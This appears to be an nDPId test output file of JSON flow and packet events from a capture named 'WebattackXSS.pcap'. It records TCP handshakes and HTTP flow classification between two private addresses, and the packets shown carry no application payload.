+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347820510,"flow_last_seen":1499347825848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347947010,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347948293,"flow_last_seen":1499347948293,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347948293,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34372,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8136,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1499347948293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347948293,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EvlAAD4GstesEAABwKgKMoZEAFDGn7d3AAAAAKACchCzjQAAAgQFtAQCCAoBPKWOAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8137,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":2,"flow_last_seen":1499347948293,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347948293,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhkRGWOs1xp+3eKAScSAH9gAAAgQFtAQCCAoD5ncCATyljgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8138,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":3,"flow_last_seen":1499347948294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347948294,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EvpAAD4Gst6sEAABwKgKMoZEAFDGn7d4RljrNoAQAOWm\/QAAAQEICgE8pY4D5ncC"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347949587,"flow_last_seen":1499347949587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347949587,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34386,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8148,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1499347949587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347949587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QMNAAD4GhQ2sEAABwKgKMoZSAFBj7eYSAAAAAKACchDmUwAAAgQFtAQCCAoBPKbRAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8149,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":2,"flow_last_seen":1499347949587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347949587,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhlIJuXRqY+3mE6AScSDs4gAAAgQFtAQCCAoD5nhGATym0QEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8150,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":3,"flow_last_seen":1499347949587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347949587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QMRAAD4GhRSsEAABwKgKMoZSAFBj7eYTCbl0a4AQAOWL6QAAAQEICgE8ptID5nhG"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347952161,"flow_last_seen":1499347952161,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347952161,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34412,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8169,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1499347952161,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347952161,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8St5AAD4GevKsEAABwKgKMoZsAFCk\/OOLAAAAAKACchClLQAAAgQFtAQCCAoBPKlVAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8170,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":2,"flow_last_seen":1499347952161,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347952161,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhmwNHcNepPzjjKAScSBW4QAAAgQFtAQCCAoD5nrJATypVQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8171,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":3,"flow_last_seen":1499347952162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347952162,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0St9AAD4GevmsEAABwKgKMoZsAFCk\/OOMDR3DX4AQAOX16AAAAQEICgE8qVUD5nrJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347953439,"flow_last_seen":1499347953439,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347953439,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34426,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8178,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":1,"flow_last_seen":1499347953439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347953439,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+l9AAD4Gy3CsEAABwKgKMoZ6AFBhTFDKAAAAAKACchB6UQAAAgQFtAQCCAoBPKqVAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8179,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":2,"flow_last_seen":1499347953439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347953439,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhnpvVsdUYUxQy6AScSDElQAAAgQFtAQCCAoD5nwJATyqlQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8180,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":577,"flow_packet_id":3,"flow_last_seen":1499347953440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347953440,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+mBAAD4Gy3esEAABwKgKMoZ6AFBhTFDLb1bHVYAQAOVjnQAAAQEICgE8qpUD5nwJ"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347954738,"flow_last_seen":1499347954738,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347954738,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34440,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8190,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":1,"flow_last_seen":1499347954738,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347954738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a+xAAD4GWeSsEAABwKgKMoaIAFCY\/8A1AAAAAKACchDR4AAAAgQFtAQCCAoBPKvZAAAAAAEDAwc="} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8191,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":2,"flow_last_seen":1499347954738,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347954738,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhoh\/\/ieLmP\/ANqAScSCqAQAAAgQFtAQCCAoD5n1OATyr2QEDAwc="} 
+00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8192,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":578,"flow_packet_id":3,"flow_last_seen":1499347954739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347954739,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a+1AAD4GWeusEAABwKgKMoaIAFCY\/8A2f\/4njIAQAOVJCAAAAQEICgE8q9oD5n1O"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347957282,"flow_last_seen":1499347957282,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957282,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":1,"flow_last_seen":1499347957282,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347957282,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82nJAAD4G612sEAABwKgKMoaiAFCv93QkAAAAAKACchAEYwAAAgQFtAQCCAoBPK5WAAAAAAEDAwc="} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8209,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":2,"flow_last_seen":1499347957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhqLwUjy4r\/d0JaAScSBUhgAAAgQFtAQCCAoD5n\/KATyuVgEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":579,"flow_packet_id":3,"flow_last_seen":1499347957283,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02nNAAD4G62SsEAABwKgKMoaiAFCv93Ql8FI8uYAQAOXzjQAAAQEICgE8rlYD5n\/K"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347823117,"flow_last_seen":1499347828846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347824426,"flow_last_seen":1499347829847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33082,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347825732,"flow_last_seen":1499347830847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33096,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347828369,"flow_last_seen":1499347833848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33122,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347829667,"flow_last_seen":1499347834848,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8217,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347832201,"flow_last_seen":1499347837849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347957887,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347958588,"flow_last_seen":1499347958588,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347958588,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8221,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":1,"flow_last_seen":1499347958588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347958588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iDdAAD4GPZmsEAABwKgKMoawAFCTxierAAAAAKACchBruQAAAgQFtAQCCAoBPK+cAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8222,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":2,"flow_last_seen":1499347958588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347958588,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhrCsuJaMk8YnrKAScSCkXAAAAgQFtAQCCAoD5oEQATyvnAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8223,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":580,"flow_packet_id":3,"flow_last_seen":1499347958589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347958589,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iDhAAD4GPaCsEAABwKgKMoawAFCTxiesrLiWjYAQAOVDZAAAAQEICgE8r5wD5oEQ"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8242,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347961167,"flow_last_seen":1499347961167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347961167,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34506,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8242,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":1,"flow_last_seen":1499347961167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347961167,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lndAAD4GL1msEAABwKgKMobKAFDSZyRWAAAAAKACchAtzgAAAgQFtAQCCAoBPLIhAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8243,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":2,"flow_last_seen":1499347961167,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347961167,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhsp1SlCg0mckV6AScSDhRgAAAgQFtAQCCAoD5oOVATyyIQEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8244,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":581,"flow_packet_id":3,"flow_last_seen":1499347961168,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347961168,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lnhAAD4GL2CsEAABwKgKMobKAFDSZyRXdUpQoYAQAOWATgAAAQEICgE8siED5oOV"} 